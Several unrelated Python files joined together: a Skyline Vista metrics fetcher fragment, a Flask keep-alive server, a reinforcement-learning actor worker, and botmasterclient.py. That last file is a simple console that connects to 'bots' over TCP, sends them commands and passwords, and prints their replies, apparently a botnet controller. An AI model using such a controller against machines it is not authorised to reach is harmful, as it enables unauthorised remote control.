start_seconds_ago = ((int(resolution_int) * 24) * 60) * 60
if 'w' in resolution:
resolution_int = resolution.strip('w')
start_seconds_ago = (((int(resolution_int) * 7) * 24) * 60) * 60
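# e.g. a hypothetical resolution of '15d' gives
# ((15 * 24) * 60) * 60 = 1296000 seconds, the default above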
pop_start_timestamp = end_timestamp - int(start_seconds_ago)
urlencoded_remote_target = quote(remote_target)
# The query_range query does not return more than
# 11000 data points as it is limited as per
# https://github.com/prometheus/prometheus/issues/2253#issuecomment-346288842
# so resample needed to be reintroduced after being
# deleted when the Prometheus request was switched
# to the query endpoint below
uri = '/api/v1/query_range?query=%s&start=%s&end=%s&step=60s' % (
str(urlencoded_remote_target),
str(pop_start_timestamp), str(end_timestamp))
# Use query endpoint for more than 11000 data points
uri = '/api/v1/query?query=%s[%s]' % (
str(urlencoded_remote_target),
str(resolution))
resolution_url = '%s%s' % (
str(remote_prometheus_host), uri)
fetch_resolution_urls.append(resolution_url)
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: fetcher :: could not determine the required pre-populate URI for values in VISTA_FETCH_METRICS tuple for - %s - %s' % (
str(populate_at_resolutions), e))
if fetch_resolution_urls:
set_fetch_resolution_urls = set(fetch_resolution_urls)
fetch_resolution_urls = list(set_fetch_resolution_urls)
flux_url = None
try:
# Submit to flux/populate_metric
protocol = 'http://'
flux_url = '%s%s:%s/populate_metric' % (
protocol, str(settings.FLUX_IP),
str(settings.FLUX_PORT))
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: fetcher :: could not build the flux URL - %s' % e)
payload = None
fetch_resolution_urls_str = '"%s"' % fetch_resolution_urls
if fetch_resolution_urls and pre_populate_graphite_metric:
try:
payload = {
'remote_host_type': remote_host_type,
'remote_target': remote_target,
'metric': metric,
'namespace_prefix': namespace_prefix,
'key': settings.FLUX_SELF_API_KEY, 'token': token, 'user': user,
'password': password,
'fetch_resolution_urls': fetch_resolution_urls_str
}
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: fetcher :: could not build the payload json - %s' % e)
if flux_url and payload:
try:
# @modified 20191011 - Task #3258: Reduce vista logging
if LOCAL_DEBUG:
logger.info('fetcher :: calling %s with payload - %s' % (
flux_url, str(payload)))
response = requests.post(flux_url, json=payload)
# @modified 20191011 - Task #3258: Reduce vista logging
if LOCAL_DEBUG:
logger.info('fetcher :: flux /populate_metric response code - %s' % (
str(response.status_code)))
# @added 20191011 - Task #3258: Reduce vista logging
good_response = False
if response.status_code == 200:
fetcher_sent_to_flux += 1
# @added 20191011 - Task #3258: Reduce vista logging
good_response = True
if response.status_code == 204:
fetcher_sent_to_flux += 1
# @added 20191011 - Task #3258: Reduce vista logging
good_response = True
# @added 20191011 - Task #3258: Reduce vista logging
if not good_response:
logger.error('fetcher :: flux /populate_metric did not respond with 200 or 204, status code - %s for %s' % (
str(response.status_code), flux_url))
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: fetcher :: could not post data to flux URL - %s, data - %s - %s' % (
str(flux_url), str(payload), e))
if not pre_populate_graphite_metric:
if last_flux_timestamp and remote_host_type == 'graphite':
try:
# Best effort to backfill any missing data
url_from = re.sub(r'^.*from=[-]', '', url)
url_period = re.sub(r'&.*', '', url_from)
if 'days' in url_period:
resolution_days = int(url_period.strip('days'))
d = datetime.today() - timedelta(days=resolution_days)
if 'hours' in url_period:
resolution_hours = int(url_period.strip('hours'))
d = datetime.today() - timedelta(hours=resolution_hours)
if 'minutes' in url_period:
resolution_minutes = int(url_period.strip('minutes'))
d = datetime.today() - timedelta(minutes=resolution_minutes)
from_resolution_timestamp = int(d.strftime('%s'))
if from_resolution_timestamp < last_flux_timestamp:
rep_str = url_period
if 'from=-' in url:
rep_str = '-%s' % url_period
fetch_from_timestamp = last_flux_timestamp - 300
url = re.sub(rep_str, str(fetch_from_timestamp), url)
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: fetcher :: could not determine backfill parameters - %s' % e)
if last_flux_timestamp and remote_host_type == 'prometheus':
try:
# Best effort to backfill any missing data
if default_prometheus_uri:
pop_start_timestamp = int(last_flux_timestamp) - 120
urlencoded_remote_target = quote(remote_target)
uri = '/api/v1/query_range?query=%s&start=%s&end=%s&step=60s' % (
str(urlencoded_remote_target),
str(pop_start_timestamp), str(end_timestamp))
url = '%s%s' % (str(remote_prometheus_host), uri)
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: fetcher :: could not determine backfill parameters - %s' % e)
metric_to_fetch = [remote_host_type, frequency, remote_target, graphite_target, metric, url, namespace_prefix, api_key, token, user, password]
metrics_to_fetch.append(metric_to_fetch)
if LOCAL_DEBUG:
logger.info('fetcher :: added metric_to_fetch - %s' % str(metric_to_fetch))
if LOCAL_DEBUG:
if metrics_to_fetch:
metrics_to_fetch_count = len(metrics_to_fetch)
logger.info('fetcher :: there are %s metrics in metrics_to_fetch' % str(metrics_to_fetch_count))
if metrics_to_fetch:
# Spawn fetch process/es
pids = []
spawned_pids = []
pid_count = 0
for i in range(1, settings.VISTA_FETCHER_PROCESSES + 1):
if i > len(metrics_to_fetch):
logger.info('fetcher :: WARNING: Skyline Vista fetcher is set for more cores than needed.')
break
try:
p = Process(target=self.fetch_process, args=(i, metrics_to_fetch))
pids.append(p)
pid_count += 1
logger.info('fetcher :: starting %s of %s fetch_process/es' % (str(pid_count), str(settings.VISTA_FETCHER_PROCESSES)))
p.start()
spawned_pids.append(p.pid)
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: fetcher :: failed to spawn fetch_process - %s' % e)
# Self monitor processes and terminate if any fetch_process has run
# for longer than VISTA_FETCHER_PROCESS_MAX_RUNTIME seconds
p_starts = time()
while time() - p_starts <= settings.VISTA_FETCHER_PROCESS_MAX_RUNTIME:
if any(p.is_alive() for p in pids):
# Just to avoid hogging the CPU
sleep(.1)
else:
# All the processes are done, break now.
time_to_run = time() - p_starts
logger.info('fetcher :: %s fetch_process/es completed in %.2f seconds' % (str(settings.VISTA_FETCHER_PROCESSES), time_to_run))
break
else:
# We only enter this if we didn't 'break' above.
logger.info('fetcher :: timed out, killing all fetch_process processes')
for p in pids:
logger.info('fetcher :: killing fetch_process process')
p.terminate()
# p.join()
logger.info('fetcher :: killed fetch_process process')
for p in pids:
if p.is_alive():
logger.info('fetcher :: stopping fetch_process - %s' % (str(p.is_alive())))
p.join()
# Sleep if it went too fast
process_runtime = int(time()) - begin_fetcher_run
metrics_fetched_count = 0
if int(process_runtime) < 60:
next_run = int(begin_fetcher_run) + 60
time_now = int(time())
sleep_for = next_run - time_now
logger.info('fetcher :: sleeping for %s seconds until next fetch' % str(sleep_for))
sleep(sleep_for)
try:
del sleep_for
except:
logger.error('error :: fetcher :: failed to del sleep_for')
try:
del next_run
except:
logger.error('error :: fetcher :: failed to del next_run')
try:
del time_now
except:
logger.error('error :: fetcher :: failed to del time_now')
metrics_fetched = []
# metrics_fetched_count = 0
try:
redis_set = 'vista.fetcher.metrics.fetched'
# @modified 20191111 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# metrics_fetched = self.redis_conn.smembers(redis_set)
metrics_fetched = self.redis_conn_decoded.smembers(redis_set)
metrics_fetched_count = len(list(metrics_fetched))
logger.info('fetcher :: %s metrics were fetched' % str(metrics_fetched_count))
except:
logger.error(traceback.format_exc())
logger.error('error :: fetcher :: could not get Redis set %s' % redis_set)
redis_set = 'vista.worker.to.process'
try:
redis_set = 'vista.fetcher.metrics.fetched'
self.redis_conn.delete(redis_set)
except:
logger.error(traceback.format_exc())
logger.error('error :: fetcher :: could not delete the Redis set %s' % redis_set)
if metrics_fetched:
timestamps = []
for str_metric_fetched in metrics_fetched:
try:
# @modified 20191111 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# Use get_redis_conn_decoded
# if python_version == 3:
# str_metric_fetched = str_metric_fetched.decode('UTF-8')
metric_fetched = literal_eval(str_metric_fetched)
timestamp = int(metric_fetched[1])
timestamps.append(timestamp)
except:
logger.error('error :: fetcher :: failed to determine timestamp from %s' % str(str_metric_fetched))
try:
timestamps.sort()
last_fetch_timestamp = int(timestamps[-1])
time_to_fetch = last_fetch_timestamp - begin_fetcher_run
logger.info('fetcher :: %s metrics fetched this run in %s seconds' % (
str(metrics_fetched_count), str(time_to_fetch)))
except:
logger.error(traceback.format_exc())
logger.error('error :: fetcher :: failed to determine last_fetch_timestamp from timestamps')
try:
redis_set = 'vista.worker.to.process'
# @modified 20191111 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# metrics_count_for_workers = len(list(self.redis_conn.smembers(redis_set)))
metrics_count_for_workers = len(list(self.redis_conn_decoded.smembers(redis_set)))
logger.info('fetcher :: %s of the metrics fetched from this run still need to be processed by a worker' % str(metrics_count_for_workers))
except:
logger.error(traceback.format_exc())
logger.error('error :: fetcher :: could not get Redis set %s' % redis_set)
send_metric_name = '%s.sent_to_flux' % skyline_app_graphite_namespace
try:
logger.info('fetcher :: sending Graphite - %s, %s' % (
send_metric_name, str(fetcher_sent_to_flux)))
fetcher_sent_to_flux_str = str(fetcher_sent_to_flux)
send_graphite_metric(parent_skyline_app, send_metric_name, fetcher_sent_to_flux_str)
except:
logger.error(traceback.format_exc())
logger.error('error :: fetcher :: could not send %s to Graphite' % send_metric_name)
# @added 20191011 - Feature #3260: vista - fetcher add time_to_fetch metric
# Added time_to_fetch, metrics_to_fetch, metrics_fetched
send_metric_name = '%s.time_to_fetch' % skyline_app_graphite_namespace
try:
logger.info('fetcher :: sending Graphite - %s, %s' % (
send_metric_name, str(process_runtime)))
fetcher_time_to_fetch_str = str(process_runtime)
send_graphite_metric(parent_skyline_app, send_metric_name, fetcher_time_to_fetch_str)
except:
logger.error(traceback.format_exc())
logger.error('error :: fetcher :: could not send %s to Graphite' % send_metric_name)
metrics_to_fetch_count = len(metrics_to_fetch)
send_metric_name = '%s.metrics_to_fetch' % skyline_app_graphite_namespace
try:
logger.info('fetcher :: sending Graphite - %s, %s' % (
send_metric_name, str(metrics_to_fetch_count)))
fetcher_metrics_to_fetch_count_str = str(metrics_to_fetch_count)
send_graphite_metric(parent_skyline_app, send_metric_name, fetcher_metrics_to_fetch_count_str)
except:
logger.error(traceback.format_exc())
logger.error('error :: fetcher :: could not send %s to Graphite' % send_metric_name)
send_metric_name = '%s.metrics_fetched' % skyline_app_graphite_namespace
try:
logger.info('fetcher :: sending Graphite - %s, %s' % (
send_metric_name, str(metrics_fetched_count)))
fetcher_metrics_fetched_count_str = str(metrics_fetched_count)
send_graphite_metric(parent_skyline_app, send_metric_name, fetcher_metrics_fetched_count_str)
except:
logger.error(traceback.format_exc())
logger.error('error :: fetcher :: could not send %s to Graphite' % send_metric_name)
try:
del process_runtime
except:
logger.error('error :: fetcher :: failed to del process_runtime')
|
keep_alive.py
|
from flask import Flask
from threading import Thread
app = Flask('')
@app.route('/')
def home():
return "Hello. Pog!"
def run():
app.run(host='0.0.0.0', port=8080)
def keep_alive():
t = Thread(target=run)
t.start()
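# Usage sketch (the bot object below is hypothetical, not part of this module):
# call keep_alive() before entering a blocking loop so the Flask server keeps
# responding on port 8080 from its background thread.
#
#   from keep_alive import keep_alive
#   keep_alive()
#   bot.run(TOKEN)  # assumed long-running blocking call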
|
botmasterclient.py
|
# -*- coding: utf-8 -*-
from socket import *
import threading
from os import system
from getpass import getpass
from time import sleep
from platform import system as s
class Botmaster:
def __init__(self):
os_name = s()
if os_name == "Windows":
self.clean = "cls"
else:
self.clean = "clear"
def conn2bot(self, ip, port):
try:
port = int(port)
except:
print("{} is not a port number.".format(port))
getpass("Press 'enter' to continue...")
return 0
else:
try:
self.sock = socket(AF_INET, SOCK_STREAM)
self.sock.connect((ip, port))
except Exception as e:
print("The connection to {} on port {} failed,\n{}".format(ip, port, e))
getpass("Press 'enter' to continue...")
return 0
else:
system(self.clean)
cmd = ""
recvstrings = threading.Thread(target=self.waiting4recv)
recvstrings.daemon = True
recvstrings.start()
print("Input 'exit' to go back.")
while cmd != "exit":
cmd = input(">>>>")
if cmd == "logp":
passw = getpass("Enter the password: ")
cmd = "logp {}".format(passw)
if cmd != "exit":
self.sock.send(cmd.encode())
self.sock.close()
sleep(2)
getpass("Press 'enter' to continue...")
def waiting4recv(self):
print("Starting 'waiting4recv' method...")
while True:
try:
r = self.sock.recv(1024).decode()
print("{}\n>>>>".format(r))
except:
print("Closing 'waiting4recv' method.")
return 0
if __name__ == '__main__':
bm = Botmaster()
do = ""
IPs = []
ports = []
while do != "exit":
system(bm.clean)
do = input('''
- B O T M A S T E R -
___________________
[C]onnect to a bot
[S]how register of connections
[exit]
>>>>''')
do = do.lower()
if do == "c":
botip = input("Input the IP of the new bot: ")
IPs.append(botip)
botport = input("Input the port that you are going to use to connect to the bot: ")
ports.append(botport)
bm.conn2bot(botip, botport)
try:
bm.sock.close()
except:
pass
elif do == "s":
count = 0
system("cls")
for i in IPs:
print("-------------------")
print("ip: {}\nport: {}".format(IPs[count], ports[count]))
print("-------------------")
count += 1
getpass("Press 'enter' to continue...")
|
actor_worker.py
|
import signal
import time
from queue import Empty
import numpy as np
import psutil
import torch
from gym.spaces import Discrete, Tuple
from torch.multiprocessing import Process as TorchProcess
from algorithms.base.actor_worker import ActorWorkerBase
from algorithms.dqn.dqn_utils import TaskType, make_env_func, set_gpus_for_process, update_reward_shaping_scheme
from algorithms.appo.policy_manager import PolicyManager
from algorithms.appo.population_based_training import PbtTask
from algorithms.utils.spaces.discretized import Discretized
from utils.timing import Timing
from utils.utils import log, AttrDict, memory_consumption_mb, join_or_kill, set_process_cpu_affinity, set_attr_if_exists
class ActorState:
"""
State of a single actor (agent) in a multi-agent environment.
Single-agent environments are treated as multi-agent with one agent for simplicity.
"""
def __init__(
self, cfg, env, worker_idx, split_idx, env_idx, agent_idx,
traj_tensors, num_traj_buffers,
policy_outputs_info, policy_output_tensors,
pbt_reward_shaping, policy_mgr,
):
self.cfg = cfg
self.env = env
self.worker_idx = worker_idx
self.split_idx = split_idx
self.env_idx = env_idx
self.agent_idx = agent_idx
self.policy_mgr = policy_mgr
self.curr_policy_id = self.policy_mgr.get_policy_for_agent(agent_idx)
self._env_set_curr_policy()
self.traj_tensors = traj_tensors
self.num_traj_buffers = num_traj_buffers
self.policy_output_names = [p.name for p in policy_outputs_info]
self.policy_output_sizes = [p.size for p in policy_outputs_info]
self.policy_output_tensors = policy_output_tensors
self.last_actions = None
self.last_rnn_state = None
self.ready = False
self.num_trajectories = 0
self.rollout_env_steps = 0
self.last_episode_reward = 0
self.last_episode_duration = 0
self.last_episode_true_reward = 0
self.last_episode_extra_stats = dict()
# whether the new episode was started during the current rollout
self.new_episode = False
self.pbt_reward_shaping = pbt_reward_shaping
self.integer_actions = False
if isinstance(env.action_space, (Discrete, Discretized)):
self.integer_actions = True
if isinstance(env.action_space, Tuple):
all_subspaces_discrete = all(isinstance(s, (Discrete, Discretized)) for s in env.action_space.spaces)
if all_subspaces_discrete:
self.integer_actions = True
else:
# technically possible to add support for such spaces, but it's untested
# for now, look at Discretized instead.
raise Exception(
'Mixed discrete & continuous action spaces are not fully supported (should be an easy fix)'
)
def _env_set_curr_policy(self):
"""
Most environments do not need to know the index of the policy that currently collects experience.
But in rare cases it is necessary. Originally implemented for DMLab to properly manage the level cache.
"""
set_attr_if_exists(self.env.unwrapped, 'curr_policy_idx', self.curr_policy_id)
def _on_new_policy(self, new_policy_id):
"""Called when the new policy is sampled for this actor."""
self.curr_policy_id = new_policy_id
# we're switching to a different policy - reset the rnn hidden state
self._reset_rnn_state()
if self.cfg.with_pbt and self.pbt_reward_shaping[self.curr_policy_id] is not None:
update_reward_shaping_scheme(self.env, self.agent_idx, self.pbt_reward_shaping[self.curr_policy_id])
def set_trajectory_data(self, data, traj_buffer_idx, rollout_step):
"""
Write a dictionary of data into a trajectory buffer at the specific location (rollout_step).
:param data: any sub-dictionary of the full per-step data, e.g. just observation, observation and action, etc.
:param traj_buffer_idx: index of the trajectory buffer we're currently using on this worker
:param rollout_step: number of steps since we started the current rollout. When this reaches cfg.rollout
we finalize the trajectory buffer and send it to the learner.
"""
index = (traj_buffer_idx, rollout_step)
self.traj_tensors.set_data(index, data)
def _reset_rnn_state(self):
self.last_rnn_state.fill_(0.0)
def curr_actions(self):
"""
:return: the latest set of actions for this actor, calculated by the policy worker for the last observation
"""
if self.integer_actions:
actions = self.last_actions.type(torch.int32).numpy()
else:
actions = self.last_actions.numpy()
if len(actions) == 1:
actions = actions.item()
return actions
def record_env_step(self, reward, done, info, traj_buffer_idx, rollout_step):
"""
Policy inputs (obs) and policy outputs (actions, values, ...) for the current rollout step
are already added to the trajectory buffer;
the only job remaining is to add auxiliary data: rewards, done flags, etc.
:param reward: last reward from the env step
:param done: last value of done flag
:param info: info dictionary
:param traj_buffer_idx: index of the trajectory buffer we're currently using on this worker
:param rollout_step: number of steps since we started the current rollout. When this reaches cfg.rollout
we finalize the trajectory buffer and send it to the learner.
"""
self.traj_tensors['rewards'][traj_buffer_idx, rollout_step][0] = float(reward)
self.traj_tensors['dones'][traj_buffer_idx, rollout_step][0] = done
env_steps = info.get('num_frames', 1)
self.rollout_env_steps += env_steps
self.last_episode_duration += env_steps
if done:
self.new_episode = True
self.last_episode_true_reward = info.get('true_reward', self.last_episode_reward)
self.last_episode_extra_stats = info.get('episode_extra_stats', dict())
def finalize_trajectory(self, rollout_step):
"""
Do some postprocessing after we finished the entire rollout.
The key thing to notice here: we never change the policy that generates the actions in the middle of the
rollout! The policy index (in PBT scenarios) is only changed between rollouts.
This means that a little bit of experience in the beginning of the next rollout can be collected
by another policy. It never matters when rollout << episode_len, but if the rollouts are long and
episodes are short, you might need to address this problem.
An alternative approach to this could be to just stop acting in the environment up until the end of the
rollout, and then mask these skipped frames as "invalid" on the learner. The current approach is much cleaner
though (but not universally applicable).
:param rollout_step: number of steps since we started the current rollout. This should be equal to
cfg.rollout in this function
:return: dictionary with auxiliary information about the trajectory
"""
t_id = f'{self.curr_policy_id}_{self.worker_idx}_{self.split_idx}_{self.env_idx}_{self.agent_idx}_{self.num_trajectories}'
traj_dict = dict(
t_id=t_id, length=rollout_step, env_steps=self.rollout_env_steps, policy_id=self.curr_policy_id,
)
self.num_trajectories += 1
self.rollout_env_steps = 0
if self.new_episode:
new_policy_id = self.policy_mgr.get_policy_for_agent(self.agent_idx)
if new_policy_id != self.curr_policy_id:
self._on_new_policy(new_policy_id)
self._env_set_curr_policy()
self.new_episode = False
return traj_dict
def update_rnn_state(self, done):
"""If we encountered an episode boundary, reset rnn states to their default values."""
if done:
self._reset_rnn_state()
def episodic_stats(self):
stats = dict(reward=self.last_episode_reward, len=self.last_episode_duration)
stats['true_reward'] = self.last_episode_true_reward
stats['episode_extra_stats'] = self.last_episode_extra_stats
report = dict(episodic=stats, policy_id=self.curr_policy_id)
self.last_episode_reward = self.last_episode_duration = self.last_episode_true_reward = 0
self.last_episode_extra_stats = dict()
return report
class VectorEnvRunner:
"""
A collection of environments simulated sequentially.
With double buffering each actor worker holds two vector runners and switches between them.
Without double buffering we only use a single VectorEnvRunner per actor worker.
All envs on a single VectorEnvRunner run in unison, e.g. they all do one step at a time together.
This also means they all finish their rollouts together. This allows us to minimize the amount of messages
passed around.
Individual envs (or agents in these envs in case of multi-agent) can potentially be controlled by different
policies when we're doing PBT. We only start simulating the next step in the environment when
all actions from all envs and all policies are collected. This leaves optimization potential: we can start
simulating some envs right away as actions for them arrive. But usually double-buffered sampling masks
this type of inefficiency anyway. The worker is probably still rendering a previous vector of envs when
the actions arrive.
"""
def __init__(self, cfg, num_envs, worker_idx, split_idx, num_agents, shared_buffers, pbt_reward_shaping):
"""
Ctor.
:param cfg: global system config (all CLI params)
:param num_envs: number of envs to run in this vector runner
:param worker_idx: idx of the parent worker
:param split_idx: index of the environment group in double-buffered sampling (either 0 or 1). Always 0 when
double-buffered sampling is disabled.
:param num_agents: number of agents in each env (1 for single-agent envs)
:param shared_buffers: a collection of all shared data structures used by the algorithm. Most importantly,
the trajectory buffers in shared memory.
:param pbt_reward_shaping: initial reward shaping dictionary, for configuration where PBT optimizes
reward coefficients in environments.
"""
self.cfg = cfg
self.num_envs = num_envs
self.worker_idx = worker_idx
self.split_idx = split_idx
self.rollout_step = 0
self.traj_buffer_idx = 0 # current shared trajectory buffer to use
self.num_agents = num_agents # queried from env
index = (worker_idx, split_idx)
self.traj_tensors = shared_buffers.tensors_individual_transitions.index(index)
self.traj_tensors_available = shared_buffers.is_traj_tensor_available[index]
self.num_traj_buffers = shared_buffers.num_traj_buffers
self.policy_outputs = shared_buffers.policy_outputs
self.policy_output_tensors = shared_buffers.policy_output_tensors[index]
self.envs, self.actor_states, self.episode_rewards = [], [], []
self.pbt_reward_shaping = pbt_reward_shaping
self.policy_mgr = PolicyManager(self.num_agents, self.cfg.num_policies)
def init(self):
"""
Actually instantiate the env instances.
Also creates ActorState objects that hold the state of individual actors in (potentially) multi-agent envs.
"""
for env_i in range(self.num_envs):
vector_idx = self.split_idx * self.num_envs + env_i
# global env id within the entire system
env_id = self.worker_idx * self.cfg.num_envs_per_worker + vector_idx
env_config = AttrDict(
worker_index=self.worker_idx, vector_index=vector_idx, env_id=env_id,
)
# log.info('Creating env %r... %d-%d-%d', env_config, self.worker_idx, self.split_idx, env_i)
env = make_env_func(self.cfg, env_config=env_config)
env.seed(env_id)
self.envs.append(env)
actor_states_env, episode_rewards_env = [], []
for agent_idx in range(self.num_agents):
agent_traj_tensors = self.traj_tensors.index((env_i, agent_idx))
actor_state = ActorState(
self.cfg, env, self.worker_idx, self.split_idx, env_i, agent_idx,
agent_traj_tensors, self.num_traj_buffers,
self.policy_outputs, self.policy_output_tensors[env_i, agent_idx],
self.pbt_reward_shaping, self.policy_mgr,
)
actor_states_env.append(actor_state)
episode_rewards_env.append(0.0)
self.actor_states.append(actor_states_env)
self.episode_rewards.append(episode_rewards_env)
def _process_policy_outputs(self, policy_id):
"""
Process the latest data from the policy worker (for policy = policy_id).
Policy outputs currently include new RNN states, actions, values, logprobs, etc. See shared_buffers.py
for the full list of outputs.
As a performance optimization, all these tensors are squished together into a single tensor.
This allows us to copy them to shared memory only once, which makes a difference on the policy worker.
Here we do torch.split to separate them back into individual tensors.
:param policy_id: index of the policy whose outputs we're currently processing
:return: whether we got all outputs for all the actors in our VectorEnvRunner. If this is True then we're
ready for the next step of the simulation.
"""
all_actors_ready = True
for env_i in range(len(self.envs)):
for agent_i in range(self.num_agents):
actor_state = self.actor_states[env_i][agent_i]
actor_policy = actor_state.curr_policy_id
if actor_policy == policy_id:
# via the shared memory mechanism, the new data should already be copied into the shared tensors
policy_outputs = torch.split(
actor_state.policy_output_tensors,
split_size_or_sections=actor_state.policy_output_sizes,
dim=0,
)
policy_outputs_dict = dict()
new_rnn_state = None
for tensor_idx, name in enumerate(actor_state.policy_output_names):
if name == 'rnn_states':
new_rnn_state = policy_outputs[tensor_idx]
else:
policy_outputs_dict[name] = policy_outputs[tensor_idx]
# save parsed trajectory outputs directly into the trajectory buffer
actor_state.set_trajectory_data(policy_outputs_dict, self.traj_buffer_idx, self.rollout_step)
actor_state.last_actions = policy_outputs_dict['actions']
# this is an rnn state for the next iteration in the rollout
actor_state.last_rnn_state = new_rnn_state
actor_state.ready = True
elif not actor_state.ready:
all_actors_ready = False
# Potential optimization: when actions are ready for all actors within one environment we can execute
# a simulation step right away, without waiting for all other actions to be calculated.
# Can be useful when number of agents per environment is small.
return all_actors_ready
def _process_rewards(self, rewards, env_i):
"""
Pretty self-explanatory, here we record the episode reward and apply the optional clipping and
scaling of rewards.
"""
for agent_i, r in enumerate(rewards):
self.actor_states[env_i][agent_i].last_episode_reward += r
rewards = np.asarray(rewards, dtype=np.float32)
rewards = rewards * self.cfg.reward_scale
rewards = np.clip(rewards, -self.cfg.reward_clip, self.cfg.reward_clip)
return rewards
def _process_env_step(self, new_obs, rewards, dones, infos, env_i):
"""
Process step outputs from a single environment in the vector.
:param new_obs: latest observations from the env
:param env_i: index of the environment in the vector
:return: episodic stats; non-empty only on episode boundaries
"""
episodic_stats = []
env_actor_states = self.actor_states[env_i]
rewards = self._process_rewards(rewards, env_i)
for agent_i in range(self.num_agents):
actor_state = env_actor_states[agent_i]
actor_state.record_env_step(
rewards[agent_i], dones[agent_i], infos[agent_i], self.traj_buffer_idx, self.rollout_step,
)
actor_state.last_obs = new_obs[agent_i]
actor_state.update_rnn_state(dones[agent_i])
# save episode stats if we are at the episode boundary
if dones[agent_i]:
episodic_stats.append(actor_state.episodic_stats())
return episodic_stats
def _finalize_trajectories(self):
"""
Do some postprocessing when we're done with the rollout.
Also see comments in actor_state.finalize_trajectory (IMPORTANT)
"""
rollouts = []
for env_i in range(self.num_envs):
for agent_i in range(self.num_agents):
actor_state = self.actor_states[env_i][agent_i]
rollout = actor_state.finalize_trajectory(self.rollout_step)
rollout['env_idx'] = env_i
rollout['agent_idx'] = agent_i
rollouts.append(rollout)
return dict(rollouts=rollouts, traj_buffer_idx=self.traj_buffer_idx)
def _format_policy_request(self):
"""
Format data that allows us to request new actions from policies that control the agents in all the envs.
Note how the data required is basically just indices of envs and agents, as well as location of the step
data in the shared rollout buffer. This is enough for the policy worker to find the step data in the shared
data structure.
:return: formatted request to be distributed to policy workers through FIFO queues.
"""
policy_request = dict()
for env_i in range(self.num_envs):
for agent_i in range(self.num_agents):
actor_state = self.actor_states[env_i][agent_i]
policy_id = actor_state.curr_policy_id
# where policy worker should look for the policy inputs for the next step
data = (env_i, agent_i, self.traj_buffer_idx, self.rollout_step)
if policy_id not in policy_request:
policy_request[policy_id] = []
policy_request[policy_id].append(data)
return policy_request
def _prepare_next_step(self):
"""
Write environment outputs to shared memory so policy workers can calculate actions for the next step.
Note how we temporarily hold obs and rnn_states in local variables before writing them into shared memory.
We cannot do the memory write right away because for that we need the memory location of the NEXT step.
If this is the first step in the new rollout, we need to switch to a new trajectory buffer before we do that
(because the previous trajectory buffer is now used by the learner and we can't use it until the learner is
done).
"""
for env_i in range(self.num_envs):
for agent_i in range(self.num_agents):
actor_state = self.actor_states[env_i][agent_i]
actor_state.ready = False
# populate policy inputs in shared memory
policy_inputs = dict(obs=actor_state.last_obs, rnn_states=actor_state.last_rnn_state)
actor_state.set_trajectory_data(policy_inputs, self.traj_buffer_idx, self.rollout_step)
def reset(self, report_queue):
"""
Do the very first reset for all environments in a vector. Populate shared memory with initial obs.
Note that this is called only once, at the very beginning of training. After this the envs should auto-reset.
:param report_queue: we use report queue to monitor reset progress (see appo.py). This can be a lengthy
process.
:return: first requests for policy workers (to generate actions for the very first env step)
"""
for env_i, e in enumerate(self.envs):
observations = e.reset()
if self.cfg.decorrelate_envs_on_one_worker:
decorrelate_steps = self.cfg.rollout * env_i + 1
log.info('Decorrelating experience for %d frames...', decorrelate_steps)
for decorrelate_step in range(decorrelate_steps):
actions = [e.action_space.sample() for _ in range(self.num_agents)]
observations, rew, dones, info = e.step(actions)
for agent_i, obs in enumerate(observations):
actor_state = self.actor_states[env_i][agent_i]
actor_state.set_trajectory_data(dict(obs=obs), self.traj_buffer_idx, self.rollout_step)
# rnn state is already initialized at zero
# log.debug(
# 'Reset progress w:%d-%d finished %d/%d, still initializing envs...',
# self.worker_idx, self.split_idx, env_i + 1, len(self.envs),
# )
report_queue.put(dict(initialized_env=(self.worker_idx, self.split_idx, env_i)))
policy_request = self._format_policy_request()
return policy_request
def advance_rollouts(self, data, timing):
"""
Main function in VectorEnvRunner. Does one step of simulation (if all actions for all actors are available).
:param data: incoming data from policy workers (policy outputs), including new actions
:param timing: this is just for profiling
:return: same as reset(), return a set of requests for policy workers, asking them to generate actions for
the next env step.
"""
with timing.add_time('save_policy_outputs'):
policy_id = data['policy_id']
all_actors_ready = self._process_policy_outputs(policy_id)
if not all_actors_ready:
# not all policies involved sent their actions, waiting for more
return None, None, None
complete_rollouts, episodic_stats = [], []
for env_i, e in enumerate(self.envs):
with timing.add_time('env_step'):
actions = [s.curr_actions() for s in self.actor_states[env_i]]
new_obs, rewards, dones, infos = e.step(actions)
with timing.add_time('overhead'):
stats = self._process_env_step(new_obs, rewards, dones, infos, env_i)
episodic_stats.extend(stats)
self.rollout_step = self.rollout_step + 1
if self.rollout_step == self.cfg.rollout:
# finalize and serialize the trajectory if we have a complete rollout
complete_rollouts = self._finalize_trajectories()
self.rollout_step = 0
self.traj_buffer_idx = (self.traj_buffer_idx + 1) % self.num_traj_buffers
# Wait for the next set of buffers to be released, if it's not ready yet.
# This should be a no-op, unless we are collecting experience faster than we can learn from it, in which
# case this will act as a speed adjusting mechanism.
if self.traj_tensors_available[:, :, self.traj_buffer_idx].min() == 0:
with timing.add_time('wait_buffers'):
self.wait_for_traj_buffers()
self._prepare_next_step()
policy_request = self._format_policy_request()
return policy_request, complete_rollouts, episodic_stats
def wait_for_traj_buffers(self):
"""
In very rare cases the learner might not have freed the shared memory buffer by the time we need it.
Here we wait until the learner is done with it.
"""
print_warning = True
while self.traj_tensors_available[:, :, self.traj_buffer_idx].min() == 0:
if print_warning:
log.warning(
'Waiting for trajectory buffer %d on actor %d-%d',
self.traj_buffer_idx, self.worker_idx, self.split_idx,
)
print_warning = False
time.sleep(0.002)
def close(self):
for e in self.envs:
e.close()
class ActorWorker(ActorWorkerBase):
"""
Top-level class defining the actor worker (called the "rollout worker" in the paper; the name here was never updated).
Works with an array (vector) of environments that is processed in portions.
Simple case, env vector is split into two parts:
1. Do an environment step in the 1st half of the vector (envs 1..N/2)
2. Send observations to a queue for action generation elsewhere (e.g. on a GPU worker)
3. Immediately start processing second half of the vector (envs N/2+1..N)
4. By the time second half is processed, actions for the 1st half should be ready. Immediately start processing
the 1st half of the vector again.
As a result, if action generation is fast enough, this env runner should be busy 100% of the time
